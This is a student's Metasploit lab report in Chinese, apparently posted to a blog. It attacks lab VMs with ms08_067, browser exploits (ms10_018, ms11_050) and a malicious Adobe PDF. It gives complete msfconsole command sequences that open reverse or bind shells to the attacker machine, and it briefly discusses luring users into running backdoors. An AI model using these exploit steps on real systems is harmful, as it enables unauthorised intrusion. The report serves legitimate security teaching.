2019-2020-2 20175309刘雨恒 《网络对抗技术》EXP6MSF基础应用

一、实验任务

(一)实验目标

掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。

(二)实验内容

1.1一个主动攻击实践,如ms08_067; (1分)
1.2 一个针对浏览器的攻击,如ms11_050;(1分)
1.3 一个针对客户端的攻击,如Adobe;(1分)
1.4 成功应用任何一个辅助模块。(0.5分)
以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的。

二、实验步骤

1.主动攻击实践

ms08_067(成功)
靶机Windows2000 Professional192.168.95.136
进入msf控制台,输入以下命令:

use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp
set LHOST 192.168.95.128
set LPORT 5309
set RHOST 192.168.95.136
set target 0
exploit

ver一下可以看到系统版本,说明攻击成功了。

ms12_020(失败)
靶机:Windows 7192.168.95.129 Windows2000 Professional192.168.95.136
MS12-020:Microsoft windows远程桌面协议RDP远程代码执行漏洞。RDP协议是一个多通道的协议,让用户连上提供微软终端机服务的电脑。Windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化或已经删除的对象,导致任意代码执行,然后控制系统。
我查看了一下需要的配置,只需要配置目标主机地址和端口号就可以。
然而配置完之后不成功。

后来又试了一下win2k,还是不成功。(难过得忘了截图了)

2.一个针对浏览器的攻击

ms11_050(失败)
靶机:Windows2000 Professional192.168.95.136
进入msf输入以下命令

use windows/browser/ms11_050_mshtml_cobjectelement
set payload windows/meterpreter/reverse_http
set LHOST 192.168.95.128
set LPORT 5309
set URIPATH 5309lyh
exploit

在靶机浏览器输入http://192.168.95.128:8080/5309lyh,发现显示不出网页,应该是失败了。

kali这边显示:192.168.0.102 ms11_050_mshtml_cobjectelement - Unknown User-Agent Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
找了很多资料也没找到解决办法,于是决定换一个。

ms10_018(成功)
靶机:Windows XP Professional192.168.95.138
进入msf输入以下命令

use windows/browser/ms10_018_ie_behaviors
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.95.138
exploit

这里生成了一个网址http://192.168.95.128:8080/91rJ3KI,在靶机的浏览器里输入该网址,kali显示Successfully migrated to services.exe (676) as: NT AUTHORITY\SYSTEM

显然已经成功了。

3.一个针对客户端的攻击

Adobe(成功)
靶机:Windows XP Professional192.168.95.138,Adobe版本9.0
进入msf输入以下命令

use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.95.128
set LPORT 5309
set FILENAME 20175309.pdf
exploit

可以看到生成了我们想要的pdf,并储存在/home/lyh5309/.msf4/local/20175309.pdf路径下
之后使用mv命令把他复制到桌面

再之后用各种办法把它搞到靶机(也就是winxp)上。
之后kali输入back,退出当前模块,再输入下面这些命令

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.95.128
set LPORT 5309
exploit

之后靶机双击20175309.pdf,成功回连

4.成功应用任何一个辅助模块。

SSH Login Check Scanner(失败)
SSH Login Check Scanner:SSH登录检查扫描仪。
先查看一下,需要配置的东西还不少。

之后按照要求进行了一一配置,不过失败了。

怀疑其中有些参数配置的有问题,进行了几次修改依然不行,后来干脆修改了IP地址。
把靶机的IP地址直接修改成了一个范围区域

但依然有问题

查资料也未寻得结果,只能作罢。

SSH Version(成功)
这个就很简单了,按照要求依次配置就可以了。

三、思考题

1.用自己的话解释什么是exploit,payload,encode
答:exploit,意思为利用。在这就是黑客利用漏洞的标识符,输入它便开始攻击漏洞。
payload,意思为载荷。后面常接着攻击代码,可以理解为运送士兵的装甲车,以保证“士兵”(攻击代码)可以在任何环境进行攻击。
encode,意思为编码器。用于伪装病毒,可以理解为吉利服,帮助病毒蒙混过关,实现免杀。
2.离实战还缺些什么技术或步骤?
答:第一,我们这次实验的靶机无一不是十年甚至二十年前的老系统,如果换做win10肯定不可能攻击成功。
第二,靶机的防火墙均处于关闭的状态,实战中几乎不可能有防火墙关闭的主机等着我们去攻击。
第三,攻击的过程中还需要将exe、pdf等后门软件拷贝到靶机上,在实战中是不可能有这种引狼入室的行为,我们必须用别的方法将后门程序送到靶机上并诱导使用者运行。

四、感想

这次用了很长很长时间,光下载合适的并安装三个虚拟机就废了好多的功夫,另外寻找一个与众不同的方法也很费时间(虽然最后也没有成功),不过也掌握了更多攻击的策略和手段。

posted @ 2020-04-29 00:38  20175309lyh  阅读(240)  评论(0编辑  收藏  举报